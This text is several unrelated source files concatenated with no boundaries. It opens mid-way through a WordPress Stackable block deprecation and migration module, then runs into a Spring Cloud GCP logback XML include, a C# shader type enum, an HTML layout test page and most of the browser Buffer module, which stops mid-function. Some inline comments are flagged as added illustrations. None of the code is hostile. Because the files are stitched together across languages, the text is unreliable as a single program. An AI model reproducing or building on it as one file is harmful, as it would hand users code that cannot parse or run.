{ applyFilters( 'stackable.image-box.save.output.after_1_17_3', null, design, props ) }
</div>
)
}
const migrate_1_17_3 = attributes => {
// Update the custom CSS since the structure has changed.
const updateCSS = css => ( css || '' )
.replace( /\.ugb-image-box__overlay(\s*{)/g, '.ugb-image-box__overlay-hover$1' )
// try and get full image url & dimensions.
return {
...attributes,
// Custom CSS.
customCSS: updateCSS( attributes.customCSS ),
customCSSCompiled: updateCSS( attributes.customCSSCompiled ),
// width option when there's only 1 column.
blockWidth: attributes.columns === 1 && attributes.align !== 'full' ? attributes.width : undefined, // Old width is the same as the block width option.
columnHeight: attributes.height,
columnContentVerticalAlign: attributes.verticalAlign,
contentAlign: attributes.horizontalAlign,
// Link.
link1Url: attributes.link1,
link2Url: attributes.link2,
link3Url: attributes.link3,
link4Url: attributes.link4,
link1NewTab: attributes.newTab1,
link2NewTab: attributes.newTab2,
link3NewTab: attributes.newTab3,
link4NewTab: attributes.newTab4,
// Image.
image1Id: attributes.imageID1,
image2Id: attributes.imageID2,
image3Id: attributes.imageID3,
image4Id: attributes.imageID4,
image1Url: attributes.imageURL1,
image2Url: attributes.imageURL2,
image3Url: attributes.imageURL3,
image4Url: attributes.imageURL4,
image1FullUrl: attributes.imageURL1,
image2FullUrl: attributes.imageURL2,
image3FullUrl: attributes.imageURL3,
image4FullUrl: attributes.imageURL4,
imageSize: 'full',
// Overlay.
showOverlay: false,
// Overlay hover.
showOverlayHover: true,
overlayHoverBackgroundColor: attributes.overlayColor,
overlayHoverOpacity: isNaN( parseInt( attributes.overlayOpacity, 10 ) ) ? 0.7 : parseInt( attributes.overlayOpacity, 10 ) / 10,
// Arrow.
showArrow: !! attributes.arrow,
arrowAlign: attributes.arrow ? attributes.arrow : undefined,
arrowColor: attributes.titleColor,
// Description.
descriptionColor: attributes.subtitleColor,
// Subtitle.
showSubtitle: false,
// Full width & 1 column.
borderRadius: attributes.columns === 1 && attributes.align === 'full' ? 0 : attributes.borderRadius,
paddingRight: attributes.columns === 1 && attributes.align === 'full' ? 0 : undefined,
paddingLeft: attributes.columns === 1 && attributes.align === 'full' ? 0 : undefined,
}
}
const deprecated = [
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3,
migrate: migrate_1_17_3,
},
/**
* If the title color and/or subtitle color were blanked in v1.17.3,
* the block errors out. The deprecation entries below fix those
* broken blocks.
*
* How? The migration fails because the saved HTML has no style
* attribute for the title, so it no longer matches the block's save
* output. The fix is to provide save methods without the style
* attribute so the generated markup matches the saved HTML again.
*/
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( false, false ),
migrate: migrate_1_17_3,
},
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( true, false ),
migrate: migrate_1_17_3,
},
{
attributes: deprecatedSchema_1_17_3,
save: deprecatedSave_1_17_3_( false, true ),
migrate: migrate_1_17_3,
},
]
export default deprecated
<?xml version="1.0" encoding="UTF-8"?>
<!-- DEPRECATED!!! PLEASE USE "org/springframework/cloud/gcp/logging/logback-appender.xml" -->
<!--
Stackdriver appender logback configuration provided for import.
-->
<included>
<property name="STACKDRIVER_LOG_NAME" value="${STACKDRIVER_LOG_NAME:-spring.log}"/>
<property name="STACKDRIVER_LOG_FLUSH_LEVEL" value="${STACKDRIVER_LOG_FLUSH_LEVEL:-WARN}"/>
<appender name="STACKDRIVER" class="org.springframework.cloud.gcp.logging.LoggingAppender">
<log>${STACKDRIVER_LOG_NAME}</log> <!-- Optional : default java.log -->
<enhancer>org.springframework.cloud.gcp.logging.TraceIdLoggingEnhancer</enhancer>
<flushLevel>${STACKDRIVER_LOG_FLUSH_LEVEL}</flushLevel> <!-- Optional : default ERROR -->
</appender>
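<!--
Illustrative usage (assumed, not part of this file): include the appender
from a logback-spring.xml and reference it from a logger, e.g.

<include resource="org/springframework/cloud/gcp/logging/logback-appender.xml"/>
<root level="INFO">
<appender-ref ref="STACKDRIVER"/>
</root>
-->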
</included>
namespace StrumpyShaderEditor
{
public enum TypeEnum {
Float,
Float2,
Float3,
Float4,
Sampler2D,
SamplerCube,
Matrix
}
public static class TypeExtensions{
public static string ShaderString(this TypeEnum typeEnum)
{
switch (typeEnum)
{
case TypeEnum.Float:
return "float";
case TypeEnum.Float2:
return "float2";
case TypeEnum.Float3:
return "float3";
case TypeEnum.Float4:
return "float4";
case TypeEnum.Sampler2D:
return "Sampler2d";
case TypeEnum.Matrix:
return "float4x4";
case TypeEnum.SamplerCube:
return "SamplerCube";
default:
return "Invalid Type";
}
}
}
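// Illustrative usage of the extension method (not part of the original file):
//   string t = TypeEnum.Float3.ShaderString();   // returns "float3"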
}
<!DOCTYPE HTML>
<html>
<head>
<style>
p { float:left; white-space:pre; border:1px solid black; clear:both; }
.space { padding:0 2px; }
table { clear:both; }
</style>
</head>
<body>
<p>
a
</p>
<div style="width:0">
<p>
a
</p>
</div>
<p>
<span class="space">a</span>
</p>
<div style="width:0">
<p class="letterspace">
<span class="space">a</span>
</p>
</div>
<table><tr>
<td style="background-color:#808080;"><pre>
test
abcdefg hijklm nopqr stuv wxy z0 1
</pre></td>
<td style="background-color:#c08080;">cell 2</td>
</tr></table>
</body>
</html>
/*!
* The buffer module from node.js, for the browser.
*
* @author Feross Aboukhadijeh <[email protected]> <http://feross.org>
* @license MIT
*/
/* eslint-disable no-proto */
'use strict'
var base64 = require('base64-js')
var ieee754 = require('ieee754')
var isArray = require('isarray')
exports.Buffer = Buffer
exports.SlowBuffer = SlowBuffer
exports.INSPECT_MAX_BYTES = 50
/**
* If `Buffer.TYPED_ARRAY_SUPPORT`:
* === true Use Uint8Array implementation (fastest)
* === false Use Object implementation (most compatible, even IE6)
*
* Browsers that support typed arrays are IE 10+, Firefox 4+, Chrome 7+, Safari 5.1+,
* Opera 11.6+, iOS 4.2+.
*
* Due to various browser bugs, sometimes the Object implementation will be used even
* when the browser supports typed arrays.
*
* Note:
*
* - Firefox 4-29 lacks support for adding new properties to `Uint8Array` instances,
* See: https://bugzilla.mozilla.org/show_bug.cgi?id=695438.
*
* - Chrome 9-10 is missing the `TypedArray.prototype.subarray` function.
*
* - IE10 has a broken `TypedArray.prototype.subarray` function which returns arrays of
* incorrect length in some situations.
* We detect these buggy browsers and set `Buffer.TYPED_ARRAY_SUPPORT` to `false` so they
* get the Object implementation, which is slower but behaves correctly.
*/
Buffer.TYPED_ARRAY_SUPPORT = global.TYPED_ARRAY_SUPPORT !== undefined
? global.TYPED_ARRAY_SUPPORT
: typedArraySupport()
/*
* Export kMaxLength after typed array support is determined.
*/
exports.kMaxLength = kMaxLength()
function typedArraySupport () {
try {
var arr = new Uint8Array(1)
arr.__proto__ = {__proto__: Uint8Array.prototype, foo: function () { return 42 }}
return arr.foo() === 42 && // typed array instances can be augmented
typeof arr.subarray === 'function' && // chrome 9-10 lack `subarray`
arr.subarray(1, 1).byteLength === 0 // ie10 has broken `subarray`
} catch (e) {
return false
}
}
function kMaxLength () {
return Buffer.TYPED_ARRAY_SUPPORT
? 0x7fffffff
: 0x3fffffff
}
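// Note (descriptive, not from the original source): with typed-array support
// the maximum buffer length is 0x7fffffff bytes (~2 GiB); the object-based
// fallback is capped at 0x3fffffff bytes (~1 GiB).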
function createBuffer (that, length) {
if (kMaxLength() < length) {
throw new RangeError('Invalid typed array length')
}
if (Buffer.TYPED_ARRAY_SUPPORT) {
// Return an augmented `Uint8Array` instance, for best performance
that = new Uint8Array(length)
that.__proto__ = Buffer.prototype
} else {
// Fallback: Return an object instance of the Buffer class
if (that === null) {
that = new Buffer(length)
}
that.length = length
}
return that
}
/**
* The Buffer constructor returns instances of `Uint8Array` that have their
* prototype changed to `Buffer.prototype`. Furthermore, `Buffer` is a subclass of
* `Uint8Array`, so the returned instances will have all the node `Buffer` methods
* and the `Uint8Array` methods. Square bracket notation works as expected -- it
* returns a single octet.
*
* The `Uint8Array` prototype remains unmodified.
*/
function Buffer (arg, encodingOrOffset, length) {
if (!Buffer.TYPED_ARRAY_SUPPORT && !(this instanceof Buffer)) {
return new Buffer(arg, encodingOrOffset, length)
}
// Common case.
if (typeof arg === 'number') {
if (typeof encodingOrOffset === 'string') {
throw new Error(
'If encoding is specified then the first argument must be a string'
)
}
return allocUnsafe(this, arg)
}
return from(this, arg, encodingOrOffset, length)
}
Buffer.poolSize = 8192 // not used by this implementation
// TODO: Legacy, not needed anymore. Remove in next major version.
Buffer._augment = function (arr) {
arr.__proto__ = Buffer.prototype
return arr
}
function from (that, value, encodingOrOffset, length) {
if (typeof value === 'number') {
throw new TypeError('"value" argument must not be a number')
}
if (typeof ArrayBuffer !== 'undefined' && value instanceof ArrayBuffer) {
return fromArrayBuffer(that, value, encodingOrOffset, length)
}
if (typeof value === 'string') {
return fromString(that, value, encodingOrOffset)
}
return fromObject(that, value)
}
/**
* Functionally equivalent to Buffer(arg, encoding) but throws a TypeError
* if value is a number.
* Buffer.from(str[, encoding])
* Buffer.from(array)
* Buffer.from(buffer)
* Buffer.from(arrayBuffer[, byteOffset[, length]])
**/
Buffer.from = function (value, encodingOrOffset, length) {
return from(null, value, encodingOrOffset, length)
}
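// Illustrative calls (not part of the original module):
//   Buffer.from('hello', 'utf8')            // decode a string
//   Buffer.from([0x62, 0x75, 0x66])         // copy an array of octets
//   Buffer.from(new ArrayBuffer(8), 0, 4)   // view part of an ArrayBuffer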
if (Buffer.TYPED_ARRAY_SUPPORT) {
Buffer.prototype.__proto__ = Uint8Array.prototype
Buffer.__proto__ = Uint8Array
if (typeof Symbol !== 'undefined' && Symbol.species &&
Buffer[Symbol.species] === Buffer) {
// Fix subarray() in ES2016. See: https://github.com/feross/buffer/pull/97
Object.defineProperty(Buffer, Symbol.species, {
value: null,
configurable: true
})
}
}
function assertSize (size) {
if (typeof size !== 'number') {
throw new TypeError('"size" argument must be a number')
} else if (size < 0) {
throw new RangeError('"size" argument must not be negative')
}
}
function alloc (that, size, fill, encoding) {
assertSize(size)
if (size <= 0) {
return createBuffer(that, size)
}
if (fill !== undefined) {
// Only pay attention to encoding if it's a string. This
// prevents accidentally sending in a number that would
    // be interpreted as a start offset.
return typeof encoding === 'string'
? createBuffer(that, size).fill(fill, encoding)
: createBuffer(that, size).fill(fill)
}
return createBuffer(that, size)
}
/**
* Creates a new filled Buffer instance.
* alloc(size[, fill[, encoding]])
**/
Buffer.alloc = function (size, fill, encoding) {
return alloc(null, size, fill, encoding)
}
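// Usage sketch (hypothetical values): Buffer.alloc(4) is zero-filled, Buffer.alloc(4, 0xff)
// yields <Buffer ff ff ff ff>, and Buffer.alloc(6, 'ab') repeats the encoded fill pattern
// via the fill() call above.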
function allocUnsafe (that, size) {
assertSize(size)
that = createBuffer(that, size < 0 ? 0 : checked(size) | 0)
if (!Buffer.TYPED_ARRAY_SUPPORT) {
for (var i = 0; i < size; ++i) {
that[i] = 0
}
}
return that
}
/**
* Equivalent to Buffer(num), by default creates a non-zero-filled Buffer instance.
* */
Buffer.allocUnsafe = function (size) {
return allocUnsafe(null, size)
}
/**
* Equivalent to SlowBuffer(num), by default creates a non-zero-filled Buffer instance.
*/
Buffer.allocUnsafeSlow = function (size) {
return allocUnsafe(null, size)
}
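// Usage sketch: Buffer.allocUnsafe(16) mirrors Node's API and makes no zero-fill guarantee;
// in this implementation the fallback path zero-fills explicitly, while the typed-array path
// relies on the engine's zero-initialized Uint8Array. Overwrite the contents (e.g. via fill()
// or write()) before reading them.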
function fromString (that, string, encoding) {
if (typeof encoding !== 'string' || encoding === '') {
encoding = 'utf8'
}
if (!Buffer.isEncoding(encoding)) {
throw new TypeError('"encoding" must be a valid string encoding')
}
var length = byteLength(string, encoding) | 0
that = createBuffer(that, length)
var actual = that.write(string, encoding)
if (actual !== length) {
// Writing a hex string, for example, that contains invalid characters will
// cause everything after the first invalid character to be ignored. (e.g.
// 'abxxcd' will be treated as 'ab')
that = that.slice(0, actual)
}
return that
}
function fromArrayLike (that, array) {
var length = array.length < 0 ? 0 : checked(array.length) | 0
that = createBuffer(that, length)
for (var i = 0; i < length; i += 1) {
that[i] = array[i] & 255
}
return that
}
function fromArrayBuffer (that, array, byteOffset, length) {
array.byteLength // this throws if `array` is not a valid ArrayBuffer
if (byteOffset < 0 || array.byteLength < byteOffset) {
throw new RangeError('\'offset\' is out of bounds')
}
if (array.byteLength < byteOffset + (length || 0)) {
throw new RangeError('\'length\' is out of bounds')
}
if (byteOffset === undefined && length === undefined) {
array = new Uint8Array(array)
} else if (length === undefined) {
array = new Uint8Array(array, byteOffset)
} else {
array = new Uint8Array(array, byteOffset, length)
}
if (Buffer.TYPED_ARRAY_SUPPORT) {
// Return an augmented `Uint8Array` instance, for best performance
that = array
that.__proto__ = Buffer.prototype
} else {
// Fallback: Return an object instance of the Buffer class
that = fromArrayLike(that, array)
}
return that
}
function fromObject (that, obj) {
if (Buffer.isBuffer(obj)) {
var len = checked(obj.length) | 0
that = createBuffer(that, len)
if (that.length === 0) {
return that
}
obj.copy(that, 0, 0, len)
return that
}
if (obj) {
if ((typeof ArrayBuffer !== 'undefined' &&
obj.buffer instanceof ArrayBuffer) || 'length' in obj) {
if (typeof obj.length !== 'number' || isnan(obj.length)) {
return createBuffer(that, 0)
}
return fromArrayLike(that, obj)
}
if (obj.type === 'Buffer' && isArray(obj.data)) {
return fromArrayLike(that, obj.data)
}
}
throw new TypeError('First argument must be a string, Buffer, ArrayBuffer, Array, or array-like object.')
}
function checked (length) {
// Note: cannot use `length < kMaxLength()` here because that fails when
// length is NaN (which is otherwise coerced to zero.)
if (length >= kMaxLength()) {
throw new RangeError('Attempt to allocate Buffer larger than maximum ' +
'size: 0x' + kMaxLength().toString(16) + ' bytes')
}
return length | 0
}
function SlowBuffer (length) {
if (+length != length) { // eslint-disable-line eqeqeq
length = 0
}
return Buffer.alloc(+length)
}
Buffer.isBuffer = function isBuffer (b) {
return !!(b != null && b._isBuffer)
}
Buffer.compare = function compare (a, b) {
if (!Buffer.isBuffer(a) || !Buffer.isBuffer(b)) {
throw new TypeError('Arguments must be Buffers')
}
if (a === b) return 0
var x = a.length
var y = b.length
for (var i = 0, len = Math.min(x, y); i < len; ++i) {
if (a[i] !== b[i]) {
x = a[i]
y = b[i]
break
}
}
if (x < y) return -1
if (y < x) return 1
return 0
}
Buffer.isEncoding = function isEncoding (encoding) {
switch (String(encoding).toLowerCase()) {
case 'hex':
case 'utf8':
case 'utf-8':
case 'ascii':
case 'latin1':
case 'binary':
case 'base64':
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return true
default:
return false
}
}
Buffer.concat = function concat (list, length) {
if (!isArray(list)) {
throw new TypeError('"list" argument must be an Array of Buffers')
}
if (list.length === 0) {
return Buffer.alloc(0)
}
var i
if (length === undefined) {
length = 0
for (i = 0; i < list.length; ++i) {
length += list[i].length
}
}
var buffer = Buffer.allocUnsafe(length)
var pos = 0
for (i = 0; i < list.length; ++i) {
var buf = list[i]
if (!Buffer.isBuffer(buf)) {
throw new TypeError('"list" argument must be an Array of Buffers')
}
buf.copy(buffer, pos)
pos += buf.length
}
return buffer
}
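// Usage sketch (hypothetical values):
//   Buffer.concat([Buffer.from('ab'), Buffer.from('cd')])    -> <Buffer 61 62 63 64>
//   Buffer.concat([Buffer.from('ab'), Buffer.from('cd')], 3) -> <Buffer 61 62 63> (capped at `length`)
// Passing a precomputed total length skips the summing loop above.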
function byteLength (string, encoding) {
if (Buffer.isBuffer(string)) {
return string.length
}
if (typeof ArrayBuffer !== 'undefined' && typeof ArrayBuffer.isView === 'function' &&
(ArrayBuffer.isView(string) || string instanceof ArrayBuffer)) {
return string.byteLength
}
if (typeof string !== 'string') {
string = '' + string
}
var len = string.length
if (len === 0) return 0
// Use a for loop to avoid recursion
var loweredCase = false
for (;;) {
switch (encoding) {
case 'ascii':
case 'latin1':
case 'binary':
return len
case 'utf8':
case 'utf-8':
case undefined:
return utf8ToBytes(string).length
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return len * 2
case 'hex':
return len >>> 1
case 'base64':
return base64ToBytes(string).length
default:
if (loweredCase) return utf8ToBytes(string).length // assume utf8
encoding = ('' + encoding).toLowerCase()
loweredCase = true
}
}
}
Buffer.byteLength = byteLength
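// Usage sketch (hypothetical values): Buffer.byteLength('€', 'utf8') is 3,
// Buffer.byteLength('abcd', 'hex') is 2, and Buffer.byteLength('ab', 'utf16le') is 4,
// matching the per-encoding rules in the switch above.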
function slowToString (encoding, start, end) {
var loweredCase = false
// No need to verify that "this.length <= MAX_UINT32" since it's a read-only
// property of a typed array.
// This behaves neither like String nor Uint8Array in that we set start/end
// to their upper/lower bounds if the value passed is out of range.
// undefined is handled specially as per ECMA-262 6th Edition,
// Section 13.3.3.7 Runtime Semantics: KeyedBindingInitialization.
if (start === undefined || start < 0) {
start = 0
}
// Return early if start > this.length. Done here to prevent potential uint32
// coercion fail below.
if (start > this.length) {
return ''
}
if (end === undefined || end > this.length) {
end = this.length
}
if (end <= 0) {
return ''
}
  // Force coercion to uint32. This will also coerce falsy/NaN values to 0.
end >>>= 0
start >>>= 0
if (end <= start) {
return ''
}
if (!encoding) encoding = 'utf8'
while (true) {
switch (encoding) {
case 'hex':
return hexSlice(this, start, end)
case 'utf8':
case 'utf-8':
return utf8Slice(this, start, end)
case 'ascii':
return asciiSlice(this, start, end)
case 'latin1':
case 'binary':
return latin1Slice(this, start, end)
case 'base64':
return base64Slice(this, start, end)
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return utf16leSlice(this, start, end)
default:
if (loweredCase) throw new TypeError('Unknown encoding: ' + encoding)
encoding = (encoding + '').toLowerCase()
loweredCase = true
}
}
}
// The property is used by `Buffer.isBuffer` and `is-buffer` (in Safari 5-7) to detect
// Buffer instances.
Buffer.prototype._isBuffer = true
function swap (b, n, m) {
var i = b[n]
b[n] = b[m]
b[m] = i
}
Buffer.prototype.swap16 = function swap16 () {
var len = this.length
if (len % 2 !== 0) {
throw new RangeError('Buffer size must be a multiple of 16-bits')
}
for (var i = 0; i < len; i += 2) {
swap(this, i, i + 1)
}
return this
}
Buffer.prototype.swap32 = function swap32 () {
var len = this.length
if (len % 4 !== 0) {
throw new RangeError('Buffer size must be a multiple of 32-bits')
}
for (var i = 0; i < len; i += 4) {
swap(this, i, i + 3)
swap(this, i + 1, i + 2)
}
return this
}
Buffer.prototype.swap64 = function swap64 () {
var len = this.length
if (len % 8 !== 0) {
throw new RangeError('Buffer size must be a multiple of 64-bits')
}
for (var i = 0; i < len; i += 8) {
swap(this, i, i + 7)
swap(this, i + 1, i + 6)
swap(this, i + 2, i + 5)
swap(this, i + 3, i + 4)
}
return this
}
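// Usage sketch (hypothetical values): Buffer.from([0x11, 0x22]).swap16() mutates the buffer
// in place to <Buffer 22 11>; lengths that are not a multiple of the element size throw a
// RangeError, as enforced above.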
Buffer.prototype.toString = function toString () {
var length = this.length | 0
if (length === 0) return ''
if (arguments.length === 0) return utf8Slice(this, 0, length)
return slowToString.apply(this, arguments)
}
Buffer.prototype.equals = function equals (b) {
if (!Buffer.isBuffer(b)) throw new TypeError('Argument must be a Buffer')
if (this === b) return true
return Buffer.compare(this, b) === 0
}
Buffer.prototype.inspect = function inspect () {
var str = ''
var max = exports.INSPECT_MAX_BYTES
if (this.length > 0) {
str = this.toString('hex', 0, max).match(/.{2}/g).join(' ')
if (this.length > max) str += ' ... '
}
return '<Buffer ' + str + '>'
}
Buffer.prototype.compare = function compare (target, start, end, thisStart, thisEnd) {
if (!Buffer.isBuffer(target)) {
throw new TypeError('Argument must be a Buffer')
}
if (start === undefined) {
start = 0
}
if (end === undefined) {
end = target ? target.length : 0
}
if (thisStart === undefined) {
thisStart = 0
}
if (thisEnd === undefined) {
thisEnd = this.length
}
if (start < 0 || end > target.length || thisStart < 0 || thisEnd > this.length) {
throw new RangeError('out of range index')
}
if (thisStart >= thisEnd && start >= end) {
return 0
}
if (thisStart >= thisEnd) {
return -1
}
if (start >= end) {
return 1
}
start >>>= 0
end >>>= 0
thisStart >>>= 0
thisEnd >>>= 0
if (this === target) return 0
var x = thisEnd - thisStart
var y = end - start
var len = Math.min(x, y)
var thisCopy = this.slice(thisStart, thisEnd)
var targetCopy = target.slice(start, end)
for (var i = 0; i < len; ++i) {
if (thisCopy[i] !== targetCopy[i]) {
x = thisCopy[i]
y = targetCopy[i]
break
}
}
if (x < y) return -1
if (y < x) return 1
return 0
}
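// Usage sketch (hypothetical values): Buffer.from('abc').compare(Buffer.from('abd')) returns -1
// because the first differing byte (0x63 vs 0x64) is smaller in the source buffer, mirroring
// the byte-wise loop above.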
// Finds either the first index of `val` in `buffer` at offset >= `byteOffset`,
// OR the last index of `val` in `buffer` at offset <= `byteOffset`.
//
// Arguments:
// - buffer - a Buffer to search
// - val - a string, Buffer, or number
// - byteOffset - an index into `buffer`; will be clamped to an int32
// - encoding - an optional encoding, relevant if val is a string
// - dir - true for indexOf, false for lastIndexOf
function bidirectionalIndexOf (buffer, val, byteOffset, encoding, dir) {
// Empty buffer means no match
if (buffer.length === 0) return -1
// Normalize byteOffset
if (typeof byteOffset === 'string') {
encoding = byteOffset
byteOffset = 0
} else if (byteOffset > 0x7fffffff) {
byteOffset = 0x7fffffff
} else if (byteOffset < -0x80000000) {
byteOffset = -0x80000000
}
byteOffset = +byteOffset // Coerce to Number.
if (isNaN(byteOffset)) {
    // byteOffset: if it's undefined, null, NaN, "foo", etc, search whole buffer
byteOffset = dir ? 0 : (buffer.length - 1)
}
// Normalize byteOffset: negative offsets start from the end of the buffer
if (byteOffset < 0) byteOffset = buffer.length + byteOffset
if (byteOffset >= buffer.length) {
if (dir) return -1
else byteOffset = buffer.length - 1
} else if (byteOffset < 0) {
if (dir) byteOffset = 0
else return -1
}
// Normalize val
if (typeof val === 'string') {
val = Buffer.from(val, encoding)
}
// Finally, search either indexOf (if dir is true) or lastIndexOf
if (Buffer.isBuffer(val)) {
// Special case: looking for empty string/buffer always fails
if (val.length === 0) {
return -1
}
return arrayIndexOf(buffer, val, byteOffset, encoding, dir)
} else if (typeof val === 'number') {
val = val & 0xFF // Search for a byte value [0-255]
if (Buffer.TYPED_ARRAY_SUPPORT &&
typeof Uint8Array.prototype.indexOf === 'function') {
if (dir) {
return Uint8Array.prototype.indexOf.call(buffer, val, byteOffset)
} else {
return Uint8Array.prototype.lastIndexOf.call(buffer, val, byteOffset)
}
}
return arrayIndexOf(buffer, [ val ], byteOffset, encoding, dir)
}
throw new TypeError('val must be string, number or Buffer')
}
function arrayIndexOf (arr, val, byteOffset, encoding, dir) {
var indexSize = 1
var arrLength = arr.length
var valLength = val.length
if (encoding !== undefined) {
encoding = String(encoding).toLowerCase()
if (encoding === 'ucs2' || encoding === 'ucs-2' ||
encoding === 'utf16le' || encoding === 'utf-16le') {
if (arr.length < 2 || val.length < 2) {
return -1
}
indexSize = 2
arrLength /= 2
valLength /= 2
byteOffset /= 2
}
}
function read (buf, i) {
if (indexSize === 1) {
return buf[i]
} else {
return buf.readUInt16BE(i * indexSize)
}
}
var i
if (dir) {
var foundIndex = -1
for (i = byteOffset; i < arrLength; i++) {
if (read(arr, i) === read(val, foundIndex === -1 ? 0 : i - foundIndex)) {
if (foundIndex === -1) foundIndex = i
if (i - foundIndex + 1 === valLength) return foundIndex * indexSize
} else {
if (foundIndex !== -1) i -= i - foundIndex
foundIndex = -1
}
}
} else {
if (byteOffset + valLength > arrLength) byteOffset = arrLength - valLength
for (i = byteOffset; i >= 0; i--) {
var found = true
for (var j = 0; j < valLength; j++) {
if (read(arr, i + j) !== read(val, j)) {
found = false
break
}
}
if (found) return i
}
}
return -1
}
Buffer.prototype.includes = function includes (val, byteOffset, encoding) {
return this.indexOf(val, byteOffset, encoding) !== -1
}
Buffer.prototype.indexOf = function indexOf (val, byteOffset, encoding) {
return bidirectionalIndexOf(this, val, byteOffset, encoding, true)
}
Buffer.prototype.lastIndexOf = function lastIndexOf (val, byteOffset, encoding) {
return bidirectionalIndexOf(this, val, byteOffset, encoding, false)
}
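// Usage sketch (hypothetical values): Buffer.from('abcabc').indexOf('bc') is 1,
// Buffer.from('abcabc').lastIndexOf('bc') is 4, and Buffer.from('abcabc').includes(0x61) is true;
// string needles are converted to Buffers with the given encoding before searching.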
function hexWrite (buf, string, offset, length) {
offset = Number(offset) || 0
var remaining = buf.length - offset
if (!length) {
length = remaining
} else {
length = Number(length)
if (length > remaining) {
length = remaining
}
}
// must be an even number of digits
var strLen = string.length
if (strLen % 2 !== 0) throw new TypeError('Invalid hex string')
if (length > strLen / 2) {
length = strLen / 2
}
for (var i = 0; i < length; ++i) {
var parsed = parseInt(string.substr(i * 2, 2), 16)
if (isNaN(parsed)) return i
buf[offset + i] = parsed
}
return i
}
function utf8Write (buf, string, offset, length) {
return blitBuffer(utf8ToBytes(string, buf.length - offset), buf, offset, length)
}
function asciiWrite (buf, string, offset, length) {
return blitBuffer(asciiToBytes(string), buf, offset, length)
}
function latin1Write (buf, string, offset, length) {
return asciiWrite(buf, string, offset, length)
}
function base64Write (buf, string, offset, length) {
return blitBuffer(base64ToBytes(string), buf, offset, length)
}
function ucs2Write (buf, string, offset, length) {
return blitBuffer(utf16leToBytes(string, buf.length - offset), buf, offset, length)
}
Buffer.prototype.write = function write (string, offset, length, encoding) {
// Buffer#write(string)
if (offset === undefined) {
encoding = 'utf8'
length = this.length
offset = 0
// Buffer#write(string, encoding)
} else if (length === undefined && typeof offset === 'string') {
encoding = offset
length = this.length
offset = 0
// Buffer#write(string, offset[, length][, encoding])
} else if (isFinite(offset)) {
offset = offset | 0
if (isFinite(length)) {
length = length | 0
if (encoding === undefined) encoding = 'utf8'
} else {
encoding = length
length = undefined
}
// legacy write(string, encoding, offset, length) - remove in v0.13
} else {
throw new Error(
'Buffer.write(string, encoding, offset[, length]) is no longer supported'
)
}
var remaining = this.length - offset
if (length === undefined || length > remaining) length = remaining
if ((string.length > 0 && (length < 0 || offset < 0)) || offset > this.length) {
throw new RangeError('Attempt to write outside buffer bounds')
}
if (!encoding) encoding = 'utf8'
var loweredCase = false
for (;;) {
switch (encoding) {
case 'hex':
return hexWrite(this, string, offset, length)
case 'utf8':
case 'utf-8':
return utf8Write(this, string, offset, length)
case 'ascii':
return asciiWrite(this, string, offset, length)
case 'latin1':
case 'binary':
return latin1Write(this, string, offset, length)
case 'base64':
// Warning: maxLength not taken into account in base64Write
return base64Write(this, string, offset, length)
case 'ucs2':
case 'ucs-2':
case 'utf16le':
case 'utf-16le':
return ucs2Write(this, string, offset, length)
default:
if (loweredCase) throw new TypeError('Unknown encoding: ' + encoding)
encoding = ('' + encoding).toLowerCase()
loweredCase = true
}
}
}
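// Usage sketch (hypothetical values): given var b = Buffer.alloc(8),
//   b.write('hi')              writes UTF-8 at offset 0 and returns 2,
//   b.write('hi', 4)           writes the same bytes at offset 4,
//   b.write('6869', 0, 'hex')  decodes the hex digits into two bytes.
// Each call returns the number of bytes actually written.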
Buffer.prototype.toJSON = function toJSON () {
return {
type: 'Buffer',
data: Array.prototype.slice.call(this._arr || this, 0)
}
}
function base64Slice (buf, start, end) {
if (start === 0 && end === buf.length) {
return base64.fromByteArray(buf)
} else {
return base64.fromByteArray(buf.slice(start, end))
}
}
function utf8Slice (buf, start, end) {
end = Math.min(buf.length, end)
var res = []
var i = start
while (i < end) {
var firstByte = buf[i]
var codePoint = null
var bytesPerSequence = (firstByte > 0xEF) ? 4
: (firstByte > 0xDF) ? 3
: (firstByte > 0xBF) ? 2
: 1
if (i + bytesPerSequence <= end) {
var secondByte, thirdByte, fourthByte, tempCodePoint
switch (bytesPerSequence) {
case 1:
if (firstByte < 0x80) {
codePoint = firstByte
}
break
case 2:
secondByte = buf[i + 1]
if ((secondByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0x1F) << 0x6 | (secondByte & 0x3F)
if (tempCodePoint > 0x7F) {
codePoint = tempCodePoint
}
}
break
case 3:
secondByte = buf[i + 1]
thirdByte = buf[i + 2]
if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0xF) << 0xC | (secondByte & 0x3F) << 0x6 | (thirdByte & 0x3F)
if (tempCodePoint > 0x7FF && (tempCodePoint < 0xD800 || tempCodePoint > 0xDFFF)) {
codePoint = tempCodePoint
}
}
break
case 4:
secondByte = buf[i + 1]
thirdByte = buf[i + 2]
fourthByte = buf[i + 3]
if ((secondByte & 0xC0) === 0x80 && (thirdByte & 0xC0) === 0x80 && (fourthByte & 0xC0) === 0x80) {
tempCodePoint = (firstByte & 0xF) << 0x12 | (secondByte & 0x3F) << 0xC | (thirdByte & 0x3F) << 0x6 | (fourthByte & 0x3F)
if (tempCodePoint > 0xFFFF && tempCodePoint < 0x110000) {
codePoint = tempCodePoint
}
}
}
}
if (codePoint === null) {
// we did not generate a valid codePoint so insert a
// replacement char (U+FFFD) and advance only 1 byte
codePoint = 0xFFFD
bytesPerSequence = 1
} else if (codePoint > 0xFFFF) {
// encode to utf16 (surrogate pair dance)
codePoint -= 0x10000
res.push(codePoint >>> 10 & 0x3FF | 0xD800)
codePoint = 0xDC00 | codePoint & 0x3FF
}
res.push(codePoint)
i += bytesPerSequence
}
return decodeCodePointsArray(res)
}
// Based on http://stackoverflow.com/a/22747272/680742, the browser with
// the lowest limit is Chrome, with 0x10000 args.
// We go 1 magnitude less, for safety
var MAX_ARGUMENTS_LENGTH = 0x1000
function decodeCodePointsArray (codePoints) {
var len = codePoints.length
if (len <= MAX_ARGUMENTS_LENGTH) {
return String.fromCharCode.apply(String, codePoints) // avoid extra slice()
}
// Decode in chunks to avoid "call stack size exceeded".
var res = ''
var i = 0
while (i < len) {
res += String.fromCharCode.apply(
String,
